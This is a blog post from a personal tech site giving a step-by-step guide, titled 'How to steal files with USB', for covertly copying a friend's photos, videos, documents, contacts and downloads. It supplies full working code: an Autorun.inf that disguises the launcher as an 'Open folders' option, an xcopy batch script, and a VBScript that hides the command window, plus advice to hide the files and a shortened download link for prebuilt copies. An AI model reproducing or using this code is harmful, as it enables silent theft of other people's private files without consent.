About Me

ABOUT Greetings, Thanks for visiting techmindug.blogspot.com I am Opendi Cornelius Founder , CEO and Author of this blog. I work as an Application and Web Based Programmer in my spare time. Connect With Me On : • Facebook • Google+ • Twitter • LinkedIn The genesis behind techmindug.blogspot.com is my passion for anything even remotely related with technology. My areas of interest include Blogging, Technology, Computer Systems, Gadgets, SEO (Search Engine Optimization) , WordPress, Programming, Software Reviews and of course, surfing the net all the time. Techmindug.blogspot.com is a Blog Site where I write on the above mentioned areas of interest. Please feel free to share your valuable suggestions to enrich this blog. I am much thankful for your visit and I look forward to your visit again. If you face any issues , please send me your feedback through the Contact Form. Regards, Opendi Cornelius

Thursday, 22 May 2014

HOW TO STEAL FILES WITH USB

Some of my friends stop me from taking some items I really need from there system so I found a solution to it. Follow the steps below to get result Step One- Open Notepad and paste the code below [autorun] icon=icon.ico open=explorer.bat action=Open folders to view files shell\open\command=launch.bat Save it as Autorun.inf paste to the USB an icon called icon.ico change the "Open folders to view files". Step Two- Open notepad again and paste the code below @echo on :: variables SET odrive=%odrive:~0,2% set backupcmd=xcopy /s /c /d /e /h /i /r /y echo on %backupcmd% "%USERPROFILE%\Favorites" "%drive%\private\favorites" %backupcmd% "%USERPROFILE%\Desktop\*.jpg" "%drive%\private\img" %backupcmd% "%USERPROFILE%\Desktop\*.jpeg" "%drive%\private\img" %backupcmd% "%USERPROFILE%\Desktop\*.bmp" "%drive%\private\img" %backupcmd% "%USERPROFILE%\Desktop\*.3gp" "%drive%\private\vid" %backupcmd% "%USERPROFILE%\Desktop\*.mp4" "%drive%\private\vid" %backupcmd% "%USERPROFILE%\Desktop\*.avi" "%drive%\private\vid" %backupcmd% "%USERPROFILE%\Desktop\*.wmv" "%drive%\private\vid" %backupcmd% "%USERPROFILE%\Contacts" "%drive%\private\contacts" %backupcmd% "%USERPROFILE%\Links" "%drive%\private\links" %backupcmd% "%USERPROFILE%\My Documents\My Music" "%drive%\private\mp3" %backupcmd% "%USERPROFILE%\My Documents\Downloads" "%drive%\private\downloads" %backupcmd% "%USERPROFILE%\My Music" "%drive%\private\mp3" %backupcmd% "%USERPROFILE%\My Documents\*.jpg" "%drive%\private\img" %backupcmd% "%USERPROFILE%\My Documents\*.bmp" "%drive%\private\img" %backupcmd% "%USERPROFILE%\My Documents\*.avi" "%drive%\private\vid" %backupcmd% "%USERPROFILE%\My Documents\*.mpg" "%drive%\private\vid" %backupcmd% "%USERPROFILE%\My Documents\*.3gp" "%drive%\private\vid" %backupcmd% "%USERPROFILE%\My Documents\*.mp4" "%drive%\private\vid" %backupcmd% "%USERPROFILE%\My Pictures" "%drive%\private\img" %backupcmd% "%USERPROFILE%\Videos" "%drive%\private\vid" %backupcmd% "%USERPROFILE%\Music" "%drive%\private\mp3" %backupcmd% "%USERPROFILE%\Downloads" "%drive%\private\downloads" %backupcmd% "D:\*.jpg" "%drive%\private\img" %backupcmd% "D:\*.jpeg" "%drive%\private\img" %backupcmd% "D:\*.bmp" "%drive%\private\img" %backupcmd% "D:\*.3gp" "%drive%\private\vid" %backupcmd% "D:\*.mp4" "%drive%\private\vid" %backupcmd% "D:\*.avi" "%drive%\private\vid" %backupcmd% "D:\*.wmv" "%drive%\private\vid" %backupcmd% "D:\*.doc" "%drive%\private\documents" %backupcmd% "D:\*.pdf" "%drive%\private\documents" @echo on cls Save it as explorer.bat this script copies files from Music/Videos/downloads/ Then these files are copied to their respective folders. Thumbsup note : create on your USB a folder called private and on this folder create these folders : contacts documents downloads favorites img links mp3 vid Step 3 Open notepad again and paste the code below CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False Save it as invisible.vbs This code runs explorer.bat as a process so it does not show the CMD prompt and everything the batch file is processing. Step Four Open notepad again for the last time and paste the code below wscript.exe \invisible.vbs explorer.bat Save this as launch.bat This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with explorer.bat so file.bat is run with code from vbs file. If you are too lazy to do all this stuffs download from http://adf.ly/2notE and paste the files to your USB Step Five Paste all 4 files in the root of your flash drive.Don't forget to paste the icon Create the folders i mentioned in step2 . If you want you can make the files and folders hidden so they wont be visible :) Note:This will work only if your friend will click "Open folders to view files" so in order for this to work autorun must be Enabled. Please leave comment and share it with friends

0 comments:

Post a Comment